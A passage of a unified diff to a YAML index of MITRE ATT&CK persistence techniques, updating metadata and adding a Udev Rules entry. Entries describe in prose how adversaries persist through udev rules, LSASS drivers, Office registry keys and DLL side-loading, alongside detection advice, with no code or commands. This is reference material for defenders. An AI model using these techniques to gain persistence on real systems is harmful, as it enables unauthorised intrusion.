         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -35187,7 +35577,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -35246,7 +35636,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -35328,7 +35717,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -35443,12 +35831,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35471,16 +35858,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -35507,7 +35893,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -35576,7 +35961,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -35612,7 +35996,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35631,12 +36015,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35686,12 +36069,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35724,9 +36106,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -35743,9 +36126,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -35791,12 +36173,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35810,7 +36191,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35869,7 +36250,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -35895,7 +36275,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -35921,13 +36301,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35951,8 +36329,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -35982,7 +36360,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -36025,7 +36402,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -36050,12 +36427,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -36095,8 +36471,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -36104,13 +36482,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -36141,17 +36519,14 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -36214,7 +36589,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -36248,8 +36623,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -36258,6 +36633,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -36270,12 +36649,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -36288,6 +36666,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -36324,17 +36703,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -36380,9 +36759,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -36419,7 +36854,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -36443,51 +36878,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36510,20 +36905,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -36553,7 +36985,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36577,12 +37009,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36666,11 +37096,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36722,9 +37151,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -36773,7 +37201,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
